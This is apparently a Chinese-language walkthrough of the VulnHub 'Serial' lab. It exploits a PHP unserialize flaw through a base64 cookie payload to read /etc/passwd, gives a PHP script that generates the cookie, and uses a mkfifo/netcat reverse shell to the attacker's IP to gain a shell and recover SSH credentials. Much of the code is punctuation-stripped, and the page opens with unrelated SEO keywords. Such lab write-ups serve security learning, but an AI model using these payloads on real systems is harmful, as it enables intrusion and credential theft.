深圳个性化建网站公司,简便网站建设,金融投资理财网站建设,梅州东莞网站建设一.信息收集
靶机地址下载#xff1a;https://download.vulnhub.com/serial/serial.zip 打开靶机#xff0c;在kali虚拟机中进行主机存活探测 可以知道靶机ip地址为192.168.133.171
然后扫描端口 可以发现有一个22端口跟80端口 然后接下来用kali扫描它的目录 可以发现有一…一.信息收集
靶机地址下载https://download.vulnhub.com/serial/serial.zip 打开靶机在kali虚拟机中进行主机存活探测 可以知道靶机ip地址为192.168.133.171
然后扫描端口 可以发现有一个22端口跟80端口 然后接下来用kali扫描它的目录 可以发现有一个可访问的目录 我们去访问一下 访问之后backup目录下有一个bak.zip 下载下来 下载下来之后有三个文件 分析一下
index.php ?php include(user.class.php); if(!isset($_COOKIE[user])) { setcookie(user, base64_encode(serialize(new User(sk4)))); } else { unserialize(base64_decode($_COOKIE[user])); } echo This is a beta test for new cookie handler\n; ? log.class.php ?php class Log { private $type_log; function __costruct($hnd) { $this-$type_log $hnd; } public function handler($val) { include($this-type_log); echo LOG: . $val; } } ? user.class.php ?php include(log.class.php); class Welcome { public function handler($val) { echo Hello . $val; } } class User { private $name; private $wel; function __construct($name) { $this-name $name; $this-wel new Welcome(); } function __destruct() { //echo bye\n; $this-wel-handler($this-name); } } ? 提示cookieburpsuite抓包看一下cookie cookie那里有一串base64加密的 解密一下 base64解码得到序列化后字段是 O:4:User:2:{s:10:Username;s:3:sk4;s:9:Userwel;O:7:Welcome:0:{}} 然后我们构造payload 读取/etc/passwd文件 O:4:User:2:{s:10:\x00User\x00name;s:5:admin;s:9:\x00User\x00wel;O:3:Log:1:{s:8:type_log;s:11:/etc/passwd;}}) base64编码 Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjM6InNrNCI7czo5OiIAVXNlcgB3ZWwiO086MzoiTG9nIjoxOntzOjg6InR5cGVfbG9nIjtzOjExOiIvZXRjL3Bhc3N3ZCI7fX0 然后再次抓包 打开用burp的repeater
将加密后的替换一下 就可以看到 然后成功包含 看到有一个sk4用户可登陆 get shell
构造序列化语句上传shell 生成一个shell放在本地网站下 然后构造payload尝试读取passwd文件payload如下 新创建一个1.php在本地的www下 然后 把type_log参数后面记得改成自己上传到本地的一句话木马
?phpclass Log {private $type_log /etc/passwd;}class User {private $name admin;private $wel;function __construct() {$this-wel new Log();}
}
$obj new User();
echo base64_encode(serialize($obj));然后去访问自己新创建的php 我这里用的是7.php 打开就看到他的base64编码 然后去抓包 把访问7.php得到的base64编码 替换cookie 成功执行
开始反弹shell
rm/tmp/f;mkfifo/tmp/f;cat/tmp/f|/bin/sh-i21|nc1192.168.133.1636666/tmp/f
将上述代码url编码后填入参数位置 然后在kali里开启监听监听成功 在攻击模块发送 成功获取shell 查看文件多返回几次上级目录找到一个txt文件 查看文件得到他的账号跟密码 最后在远程连接 成功进入
